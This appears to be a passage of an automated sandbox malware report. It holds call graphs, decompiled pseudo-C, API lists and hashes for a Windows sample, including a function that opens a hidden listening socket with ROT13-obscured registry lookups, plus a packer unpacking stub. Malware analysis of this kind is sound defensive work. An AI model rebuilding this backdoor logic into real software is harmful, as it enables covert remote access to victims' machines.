6481 40ab53 malloc 6479->6481 6480->6484 6482 40ab66 TlsSetValue 6481->6482 6481->6484 6482->6484 6485 40abba GetLastError 6482->6485 6483 40a8b0 2 API calls 6483->6484 6484->6475 6484->6479 6484->6483 6486 40a430 66 API calls 6484->6486 6485->6484 6486->6484 5932 4098ae 5933 4098b0 5932->5933 5934 4098cd 5933->5934 5935 4094a0 strcmp 5933->5935 5936 4094a0 strcmp 5934->5936 5937 4098dc 5934->5937 5935->5934 5936->5937 5938 4098b0 5939 409900 5938->5939 5940 4098cd 5938->5940 5941 4094a0 strcmp 5939->5941 5942 4094a0 strcmp 5940->5942 5943 4098dc 5940->5943 5941->5940 5942->5943 6494 402bba lstrcat lstrcat 6515 404eae GetTickCount srand rand 6494->6515 6496 402bfc 6497 402c00 6496->6497 6498 402c71 6496->6498 6516 404eae GetTickCount srand rand 6497->6516 6518 404eae GetTickCount srand rand 6498->6518 6501 402c0c lstrcat 6517 404eae GetTickCount srand rand 6501->6517 6502 402c7d lstrcat 6519 404eae GetTickCount srand rand 6502->6519 6505 402c34 lstrcat lstrcat 6507 402ce0 6505->6507 6506 402ca5 lstrcat lstrcat 6506->6507 6508 404620 5 API calls 6507->6508 6510 402d10 6508->6510 6509 404f0a 3 API calls 6509->6510 6510->6509 6511 402ed6 6510->6511 6512 402ebe Sleep 6510->6512 6513 405ee8 128 API calls 6511->6513 6512->6510 6514 402f1d 6513->6514 6515->6496 6516->6501 6517->6505 6518->6502 6519->6506 6520 40bfbc 6521 40bfc0 GetLastError TlsGetValue SetLastError 6520->6521

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 116 10002020-10002056 WSAStartup 117 1000205c-10002080 socket 116->117 118 100021fd-10002206 116->118 119 10002086-10002116 htons rot13 Get_Reg_SZ 117->119 120 100021f8 117->120 119->118 121 1000211c-1000214b Get_Reg_SZ 119->121 120->118 121->118 122 10002151-1000219d rot13 * 2 bind 121->122 123 100021ed-100021f5 closesocket 122->123 124 1000219f-100021bb listen 122->124 123->120 124->123 125 100021bd-100021d9 accept 124->125 125->125 126 100021db-100021eb create_thread 125->126 126->125
                                                                          C-Code - Quality: 22%
                                                                          			E10002020() {
                                                                          				void* _v16;
                                                                          				char _v156;
                                                                          				void _v204;
                                                                          				void _v252;
                                                                          				void* _v266;
                                                                          				void _v268;
                                                                          				char _v668;
                                                                          				char _v672;
                                                                          				char _v696;
                                                                          				int _v700;
                                                                          				intOrPtr _v704;
                                                                          				intOrPtr _v712;
                                                                          				void* _v716;
                                                                          				void* _v720;
                                                                          				int _v732;
                                                                          				char _v736;
                                                                          				intOrPtr _v740;
                                                                          				intOrPtr _v752;
                                                                          				void* __ebx;
                                                                          				char _t39;
                                                                          				void* _t42;
                                                                          				void* _t48;
                                                                          				void* _t51;
                                                                          				char* _t56;
                                                                          				void* _t57;
                                                                          				char* _t60;
                                                                          				char* _t61;
                                                                          				int _t68;
                                                                          				char _t75;
                                                                          				void* _t76;
                                                                          				intOrPtr* _t78;
                                                                          				void* _t80;
                                                                          				intOrPtr* _t84;
                                                                          				intOrPtr* _t85;
                                                                          
                                                                          				_v672 = 0x10;
                                                                          				_t39 =  &_v668;
                                                                          				_v696 = _t39;
                                                                          				_v700 = 0x202;
                                                                          				L10003034();
                                                                          				_t78 = _t76 - 0x2a4;
                                                                          				_t68 = 0;
                                                                          				if(_t39 != 0) {
                                                                          					L10:
                                                                          					return _t68;
                                                                          				}
                                                                          				_v700 = 0;
                                                                          				_v704 = 1;
                                                                          				 *_t78 = 2; // executed
                                                                          				L1000301C(); // executed
                                                                          				_t80 = _t78 - 0xc;
                                                                          				_t75 = _t39;
                                                                          				if(_t39 == 0xffffffff) {
                                                                          					L9:
                                                                          					_t68 = 0;
                                                                          					goto L10;
                                                                          				}
                                                                          				asm("cld");
                                                                          				_t42 = memset( &_v268, 0, 4 << 2);
                                                                          				_v268 = 2;
                                                                          				_v720 = 0xc57;
                                                                          				L1000303C();
                                                                          				_v266 = _t42;
                                                                          				asm("cld");
                                                                          				memset( &_v252, memset( &_v204, 0, 0xa << 2), 0xa << 2);
                                                                          				_t84 = _t80 + 0xc - 4 + 0x18;
                                                                          				_v720 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
                                                                          				_t60 =  &_v156;
                                                                          				 *_t84 = _t60;
                                                                          				E10001F26();
                                                                          				_v712 = 0x28;
                                                                          				_v716 =  &_v204;
                                                                          				_v720 = "usw";
                                                                          				 *_t84 = _t60; // executed
                                                                          				_t48 = E10001F57(_t60); // executed
                                                                          				_t68 = 0;
                                                                          				if(_t48 == 0) {
                                                                          					goto L10;
                                                                          				}
                                                                          				_v712 = 0x28;
                                                                          				_v716 =  &_v252;
                                                                          				_v720 = "pafw";
                                                                          				 *_t84 =  &_v156; // executed
                                                                          				_t51 = E10001F57(_t60); // executed
                                                                          				_t68 = 0;
                                                                          				if(_t51 == 0) {
                                                                          					goto L10;
                                                                          				}
                                                                          				_v720 =  &_v204;
                                                                          				 *_t84 = 0x10006054;
                                                                          				E10001F26();
                                                                          				_v720 =  &_v252;
                                                                          				 *_t84 = 0x100060c4;
                                                                          				E10001F26();
                                                                          				_v716 = 0x10;
                                                                          				_t56 =  &_v268;
                                                                          				_v720 = _t56;
                                                                          				 *_t84 = _t75; // executed
                                                                          				L10003044(); // executed
                                                                          				_t85 = _t84 - 0xc;
                                                                          				if(_t56 == 0xffffffff) {
                                                                          					L8:
                                                                          					_v736 = _t75;
                                                                          					L10003014();
                                                                          					goto L9;
                                                                          				}
                                                                          				_v732 = 0;
                                                                          				_v736 = _t75; // executed
                                                                          				L1000304C(); // executed
                                                                          				_t85 = _t85 - 8;
                                                                          				_t61 =  &_v672;
                                                                          				if(_t56 == 0xffffffff) {
                                                                          					goto L8;
                                                                          				}
                                                                          				L6:
                                                                          				_v736 = _t61;
                                                                          				_t57 =  &_v268;
                                                                          				_v740 = _t57;
                                                                          				 *_t85 = _t75; // executed
                                                                          				L10003054(); // executed
                                                                          				_t85 = _t85 - 0xc;
                                                                          				if(_t57 != 0xffffffff) {
                                                                          					_v752 = _t57;
                                                                          					 *_t85 = E10001C8C;
                                                                          					E10001180();
                                                                          				}
                                                                          				goto L6;
                                                                          			}





































                                                                          0x1000202c
                                                                          0x10002036
                                                                          0x1000203c
                                                                          0x10002040
                                                                          0x10002047
                                                                          0x1000204c
                                                                          0x1000204f
                                                                          0x10002056
                                                                          0x100021fd
                                                                          0x10002206
                                                                          0x10002206
                                                                          0x1000205c
                                                                          0x10002064
                                                                          0x1000206c
                                                                          0x10002073
                                                                          0x10002078
                                                                          0x1000207b
                                                                          0x10002080
                                                                          0x100021f8
                                                                          0x100021f8
                                                                          0x00000000
                                                                          0x100021f8
                                                                          0x1000208c
                                                                          0x10002099
                                                                          0x1000209b
                                                                          0x100020a4
                                                                          0x100020ab
                                                                          0x100020b3
                                                                          0x100020c0
                                                                          0x100020d5
                                                                          0x100020d5
                                                                          0x100020d7
                                                                          0x100020df
                                                                          0x100020e5
                                                                          0x100020e8
                                                                          0x100020ed
                                                                          0x100020fb
                                                                          0x100020ff
                                                                          0x10002107
                                                                          0x1000210a
                                                                          0x1000210f
                                                                          0x10002116
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000211c
                                                                          0x1000212a
                                                                          0x1000212e
                                                                          0x1000213c
                                                                          0x1000213f
                                                                          0x10002144
                                                                          0x1000214b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10002157
                                                                          0x1000215b
                                                                          0x10002162
                                                                          0x1000216d
                                                                          0x10002171
                                                                          0x10002178
                                                                          0x1000217d
                                                                          0x10002185
                                                                          0x1000218b
                                                                          0x1000218f
                                                                          0x10002192
                                                                          0x10002197
                                                                          0x1000219d
                                                                          0x100021ed
                                                                          0x100021ed
                                                                          0x100021f0
                                                                          0x00000000
                                                                          0x100021f5
                                                                          0x1000219f
                                                                          0x100021a7
                                                                          0x100021aa
                                                                          0x100021af
                                                                          0x100021b2
                                                                          0x100021bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x100021bd
                                                                          0x100021bd
                                                                          0x100021c1
                                                                          0x100021c7
                                                                          0x100021cb
                                                                          0x100021ce
                                                                          0x100021d3
                                                                          0x100021d9
                                                                          0x100021db
                                                                          0x100021df
                                                                          0x100021e6
                                                                          0x100021e6
                                                                          0x00000000

                                                                          APIs
                                                                          • WSAStartup.WS2_32 ref: 10002047
                                                                          • socket.WS2_32 ref: 10002073
                                                                          • htons.WS2_32 ref: 100020AB
                                                                          • rot13.SHERVANS ref: 100020E8
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • Get_Reg_SZ.SHERVANS ref: 1000210A
                                                                            • Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001F90
                                                                            • Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001FBE
                                                                            • Part of subcall function 10001F57: RegQueryValueExA.ADVAPI32 ref: 10001FF9
                                                                            • Part of subcall function 10001F57: RegCloseKey.ADVAPI32 ref: 10002009
                                                                          • Get_Reg_SZ.SHERVANS ref: 1000213F
                                                                          • rot13.SHERVANS ref: 10002162
                                                                          • rot13.SHERVANS ref: 10002178
                                                                          • bind.WSOCK32 ref: 10002192
                                                                          • listen.WS2_32 ref: 100021AA
                                                                          • accept.WS2_32 ref: 100021CE
                                                                          • create_thread.SHERVANS ref: 100021E6
                                                                          • closesocket.WS2_32 ref: 100021F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rot13$Get_OpenReg_$CloseQueryStartupValueacceptbindclosesocketcreate_threadhtonslistenrot13csocket
                                                                          • String ID: ($@P
                                                                          • API String ID: 4131626927-3767838720
                                                                          • Opcode ID: d78ab5753523488464efac9591bc959a05145e684d76b3ee9f59682df6552bca
                                                                          • Instruction ID: 518850a0735b41474e77e1906edfbaa0d3577d285dae3c11e1d321053acd375c
                                                                          • Opcode Fuzzy Hash: d78ab5753523488464efac9591bc959a05145e684d76b3ee9f59682df6552bca
                                                                          • Instruction Fuzzy Hash: 18418EB48093049AE750EF24C9443EEBBF4EF40390F40CA7DE59887285EB759A889F43
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 64%
                                                                          			E00401150() {
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char* _v32;
                                                                          				intOrPtr _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				intOrPtr _t20;
                                                                          				char _t23;
                                                                          				intOrPtr* _t25;
                                                                          				void* _t35;
                                                                          				void* _t36;
                                                                          				intOrPtr _t37;
                                                                          				intOrPtr _t38;
                                                                          				void* _t39;
                                                                          				signed int _t40;
                                                                          
                                                                          				_v44 = E00401000; // executed
                                                                          				SetUnhandledExceptionFilter(??); // executed
                                                                          				_t40 = _t39 - 4;
                                                                          				E0040B000(E0040AF00(_t35, _t36));
                                                                          				_v12 = 0;
                                                                          				_v32 =  &_v12;
                                                                          				_t20 =  *0x40d4e4; // 0xffffffff
                                                                          				 *_t40 = 0x414004;
                                                                          				_v36 = _t20;
                                                                          				_v40 =  &_v16;
                                                                          				_v44 = 0x414000;
                                                                          				L0040C1B0();
                                                                          				_t23 =  *0x418230;
                                                                          				if(_t23 == 0) {
                                                                          					L6:
                                                                          					L0040C1A0();
                                                                          					_t37 =  *0x40d4e8; // 0x4000
                                                                          					 *_t23 = _t37;
                                                                          					E0040AED0(_t23);
                                                                          					_t40 = _t40 & 0xfffffff0; // executed
                                                                          					_t25 = E0040AEB0(); // executed
                                                                          					L0040C190();
                                                                          					_v40 =  *_t25;
                                                                          					_v44 =  *0x414000;
                                                                          					 *_t40 =  *0x414004; // executed
                                                                          					_t23 = E00404076(_t37); // executed
                                                                          					L0040C188();
                                                                          					 *_t40 = _t23; // executed
                                                                          					ExitProcess(??); // executed
                                                                          					L7:
                                                                          					_v40 = _t23;
                                                                          					_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
                                                                          					_v44 = _t23;
                                                                          					L0040C1A8();
                                                                          					_t38 =  *0x4194a4;
                                                                          					L2:
                                                                          					if(_t38 != 0xffffffe0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t38 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t38 != 0xffffffc0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				 *0x40d4e8 = _t23;
                                                                          				_t38 =  *0x4194a4;
                                                                          				if(_t38 != 0) {
                                                                          					goto L7;
                                                                          				}
                                                                          				goto L2;
                                                                          			}


















                                                                          0x00401157
                                                                          0x0040115e
                                                                          0x00401163
                                                                          0x0040116b
                                                                          0x00401170
                                                                          0x0040117a
                                                                          0x0040117e
                                                                          0x00401183
                                                                          0x0040118a
                                                                          0x00401191
                                                                          0x0040119a
                                                                          0x0040119e
                                                                          0x004011a3
                                                                          0x004011aa
                                                                          0x00401210
                                                                          0x00401210
                                                                          0x00401215
                                                                          0x0040121b
                                                                          0x0040121d
                                                                          0x00401222
                                                                          0x00401225
                                                                          0x0040122a
                                                                          0x00401231
                                                                          0x0040123a
                                                                          0x00401243
                                                                          0x00401246
                                                                          0x0040124d
                                                                          0x00401252
                                                                          0x00401255
                                                                          0x00401260
                                                                          0x00401260
                                                                          0x00401269
                                                                          0x0040126c
                                                                          0x0040126f
                                                                          0x00401274
                                                                          0x004011bf
                                                                          0x004011c2
                                                                          0x004011c9
                                                                          0x004011d2
                                                                          0x004011d5
                                                                          0x004011d8
                                                                          0x004011dd
                                                                          0x004011dd
                                                                          0x004011e6
                                                                          0x004011ed
                                                                          0x004011f6
                                                                          0x004011f9
                                                                          0x004011fc
                                                                          0x004011fc
                                                                          0x00000000
                                                                          0x004011e6
                                                                          0x004011ac
                                                                          0x004011b1
                                                                          0x004011b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 3695137517-0
                                                                          • Opcode ID: b4eaf857ed3212c497738ef17982bc4edc5aafd90f9051ff687a4a2c9b8e1448
                                                                          • Instruction ID: fe54e7aefeed6918a5ef1b916f0e819b51a912cea38922c35654569b06e5a2dd
                                                                          • Opcode Fuzzy Hash: b4eaf857ed3212c497738ef17982bc4edc5aafd90f9051ff687a4a2c9b8e1448
                                                                          • Instruction Fuzzy Hash: 8631EDB4908701DFC700EF75D98154E77E5BF88354F008A7EE545AB3A2D73898418B5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 82%
                                                                          			E00401149() {
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char* _v32;
                                                                          				intOrPtr _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				intOrPtr _t20;
                                                                          				char _t23;
                                                                          				intOrPtr* _t25;
                                                                          				_Unknown_base(*)()* _t34;
                                                                          				void* _t36;
                                                                          				void* _t37;
                                                                          				intOrPtr _t38;
                                                                          				intOrPtr _t39;
                                                                          				void* _t42;
                                                                          				signed int _t44;
                                                                          
                                                                          				_v44 = E00401000; // executed
                                                                          				SetUnhandledExceptionFilter(_t34); // executed
                                                                          				_t44 = _t42 - 0x20;
                                                                          				E0040B000(E0040AF00(_t36, _t37));
                                                                          				_v12 = 0;
                                                                          				_v32 =  &_v12;
                                                                          				_t20 =  *0x40d4e4; // 0xffffffff
                                                                          				 *_t44 = 0x414004;
                                                                          				_v36 = _t20;
                                                                          				_v40 =  &_v16;
                                                                          				_v44 = 0x414000;
                                                                          				L0040C1B0();
                                                                          				_t23 =  *0x418230;
                                                                          				if(_t23 == 0) {
                                                                          					L7:
                                                                          					L0040C1A0();
                                                                          					_t38 =  *0x40d4e8; // 0x4000
                                                                          					 *_t23 = _t38;
                                                                          					E0040AED0(_t23);
                                                                          					_t44 = _t44 & 0xfffffff0; // executed
                                                                          					_t25 = E0040AEB0(); // executed
                                                                          					L0040C190();
                                                                          					_v40 =  *_t25;
                                                                          					_v44 =  *0x414000;
                                                                          					 *_t44 =  *0x414004; // executed
                                                                          					_t23 = E00404076(_t38); // executed
                                                                          					L0040C188();
                                                                          					 *_t44 = _t23; // executed
                                                                          					ExitProcess(??); // executed
                                                                          					goto L8;
                                                                          				} else {
                                                                          					 *0x40d4e8 = _t23;
                                                                          					_t39 =  *0x4194a4;
                                                                          					if(_t39 != 0) {
                                                                          						L8:
                                                                          						_v40 = _t23;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t39 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t39 != 0xffffffe0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t39 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t39 != 0xffffffc0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          					}
                                                                          					goto L7;
                                                                          				}
                                                                          			}



















                                                                          0x00401157
                                                                          0x0040115e
                                                                          0x00401163
                                                                          0x0040116b
                                                                          0x00401170
                                                                          0x0040117a
                                                                          0x0040117e
                                                                          0x00401183
                                                                          0x0040118a
                                                                          0x00401191
                                                                          0x0040119a
                                                                          0x0040119e
                                                                          0x004011a3
                                                                          0x004011aa
                                                                          0x00401210
                                                                          0x00401210
                                                                          0x00401215
                                                                          0x0040121b
                                                                          0x0040121d
                                                                          0x00401222
                                                                          0x00401225
                                                                          0x0040122a
                                                                          0x00401231
                                                                          0x0040123a
                                                                          0x00401243
                                                                          0x00401246
                                                                          0x0040124d
                                                                          0x00401252
                                                                          0x00401255
                                                                          0x00000000
                                                                          0x004011ac
                                                                          0x004011ac
                                                                          0x004011b1
                                                                          0x004011b9
                                                                          0x00401260
                                                                          0x00401260
                                                                          0x00401269
                                                                          0x0040126c
                                                                          0x0040126f
                                                                          0x00401274
                                                                          0x00401274
                                                                          0x004011c2
                                                                          0x004011c9
                                                                          0x004011d2
                                                                          0x004011d5
                                                                          0x004011d8
                                                                          0x004011dd
                                                                          0x004011dd
                                                                          0x004011e6
                                                                          0x004011ed
                                                                          0x004011f6
                                                                          0x004011f9
                                                                          0x004011fc
                                                                          0x004011fc
                                                                          0x00000000
                                                                          0x004011e6

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 3695137517-0
                                                                          • Opcode ID: de32d829cb3842ad61717656b7ea68eb81935684880d1ae83627c20b65cc97da
                                                                          • Instruction ID: 7cb89241a2ef958f6d0767399d1a1595bed5fc4071ce6b0a09e50a244a9f3c8c
                                                                          • Opcode Fuzzy Hash: de32d829cb3842ad61717656b7ea68eb81935684880d1ae83627c20b65cc97da
                                                                          • Instruction Fuzzy Hash: CF21FDB4904700DFC700EFB5D98164A7BE5BF88354F008A7EE545AB3A2D738A8418B5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 49%
                                                                          			_entry_() {
                                                                          				char _v128;
                                                                          				void _t20;
                                                                          				void _t23;
                                                                          				void _t24;
                                                                          				signed int _t26;
                                                                          				struct HINSTANCE__* _t27;
                                                                          				unsigned int _t28;
                                                                          				char _t38;
                                                                          				signed char* _t40;
                                                                          				long _t41;
                                                                          				char* _t44;
                                                                          				long _t54;
                                                                          				long _t55;
                                                                          				long _t56;
                                                                          				char* _t60;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          				void* _t66;
                                                                          				void* _t67;
                                                                          				unsigned int* _t68;
                                                                          				CHAR* _t70;
                                                                          				char* _t71;
                                                                          				long* _t72;
                                                                          				struct HINSTANCE__* _t73;
                                                                          				long _t74;
                                                                          				void* _t75;
                                                                          				void* _t78;
                                                                          				long _t79;
                                                                          				long _t81;
                                                                          				long _t86;
                                                                          				long _t89;
                                                                          
                                                                          				asm("pushad");
                                                                          				_t72 = 0x428015;
                                                                          				_t1 = _t72 - 0x27015; // 0x401000
                                                                          				_t67 = _t1;
                                                                          				_push(_t67);
                                                                          				while(1) {
                                                                          					_t53 =  *_t72;
                                                                          					_t72 = _t72 - 0xfffffffc;
                                                                          					asm("adc ebx, ebx");
                                                                          					do {
                                                                          						if(_t79 < 0) {
                                                                          							_t20 =  *_t72;
                                                                          							_t72 =  &(_t72[0]);
                                                                          							 *_t67 = _t20;
                                                                          							_t67 = _t67 + 1;
                                                                          							goto L4;
                                                                          						}
                                                                          						goto L8;
                                                                          						do {
                                                                          							do {
                                                                          								L8:
                                                                          								_t54 = _t53 + _t53;
                                                                          								if(_t54 == 0) {
                                                                          									_t54 =  *_t72;
                                                                          									_t72 = _t72 - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								}
                                                                          								asm("adc eax, eax");
                                                                          								_t53 = _t54 + _t54;
                                                                          								_t81 = _t53;
                                                                          							} while (_t81 >= 0);
                                                                          							if(_t81 != 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t53 =  *_t72;
                                                                          							_t72 = _t72 - 0xfffffffc;
                                                                          							asm("adc ebx, ebx");
                                                                          						} while (_t72 >= 0);
                                                                          						_t61 = 0;
                                                                          						if(0xfffffffffffffffe < 0) {
                                                                          							L16:
                                                                          							_t55 = _t53 + _t53;
                                                                          							if(_t55 == 0) {
                                                                          								_t55 =  *_t72;
                                                                          								_t72 = _t72 - 0xfffffffc;
                                                                          								asm("adc ebx, ebx");
                                                                          							}
                                                                          							asm("adc ecx, ecx");
                                                                          							_t53 = _t55 + _t55;
                                                                          							_t86 = _t53;
                                                                          							if(_t86 == 0) {
                                                                          								_t53 =  *_t72;
                                                                          								_t72 = _t72 - 0xfffffffc;
                                                                          								asm("adc ebx, ebx");
                                                                          							}
                                                                          							asm("adc ecx, ecx");
                                                                          							if(_t86 != 0) {
                                                                          								L28:
                                                                          								asm("adc ecx, 0x1");
                                                                          								_t66 = _t67 + _t73;
                                                                          								if(_t73 <= 0xfffffffc) {
                                                                          									do {
                                                                          										_t23 =  *_t66;
                                                                          										_t66 = _t66 + 4;
                                                                          										 *_t67 = _t23;
                                                                          										_t67 = _t67 + 4;
                                                                          										_t61 = _t61 - 4;
                                                                          									} while (_t61 > 0);
                                                                          									_t67 = _t67 + _t61;
                                                                          									goto L4;
                                                                          								} else {
                                                                          									goto L29;
                                                                          								}
                                                                          								do {
                                                                          									L29:
                                                                          									_t24 =  *_t66;
                                                                          									_t66 = _t66 + 1;
                                                                          									 *_t67 = _t24;
                                                                          									_t67 = _t67 + 1;
                                                                          									_t61 = _t61 - 1;
                                                                          								} while (_t61 != 0);
                                                                          								goto L4;
                                                                          							} else {
                                                                          								_t62 = _t61 + 1;
                                                                          								goto L22;
                                                                          								do {
                                                                          									do {
                                                                          										L22:
                                                                          										_t56 = _t53 + _t53;
                                                                          										if(_t56 == 0) {
                                                                          											_t56 =  *_t72;
                                                                          											_t72 = _t72 - 0xfffffffc;
                                                                          											asm("adc ebx, ebx");
                                                                          										}
                                                                          										asm("adc ecx, ecx");
                                                                          										_t53 = _t56 + _t56;
                                                                          										_t89 = _t53;
                                                                          									} while (_t89 >= 0);
                                                                          									if(_t89 != 0) {
                                                                          										break;
                                                                          									}
                                                                          									_t53 =  *_t72;
                                                                          									_t72 = _t72 - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								} while (_t72 >= 0);
                                                                          								_t61 = _t62 + 2;
                                                                          								goto L28;
                                                                          							}
                                                                          						}
                                                                          						_t26 =  *_t72;
                                                                          						_t72 =  &(_t72[0]);
                                                                          						_t27 = _t26 ^ 0xffffffff;
                                                                          						if(_t27 == 0) {
                                                                          							_pop(_t72);
                                                                          							_t3 =  &(_t72[0x8400]); // 0x422000
                                                                          							_t68 = _t3;
                                                                          							do {
                                                                          								_t28 =  *_t68;
                                                                          								_t68 =  &(_t68[0]);
                                                                          							} while (_t28 - 0xe8 > 1 ||  *_t68 != 2);
                                                                          							asm("rol eax, 0x10");
                                                                          							 *_t68 = ( *_t68 >> 8) - _t68 + _t72;
                                                                          							asm("loop 0xffffffdb");
                                                                          							_t6 =  &(_t72[0xd000]); // 0x435000
                                                                          							_t70 = _t6;
                                                                          							while(1) {
                                                                          								L37:
                                                                          								_t38 =  *_t70;
                                                                          								if(_t38 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								_t7 =  &(_t70[4]); // 0x18368
                                                                          								_t60 = _t72 +  *_t7;
                                                                          								_t71 =  &(_t70[8]);
                                                                          								_t73 = LoadLibraryA( &(_t72[0xd944]) + _t38);
                                                                          								while(1) {
                                                                          									_t70 =  &(_t71[1]);
                                                                          									if( *_t71 == 0) {
                                                                          										goto L37;
                                                                          									}
                                                                          									asm("repne scasb");
                                                                          									_t38 = GetProcAddress(_t73, _t70);
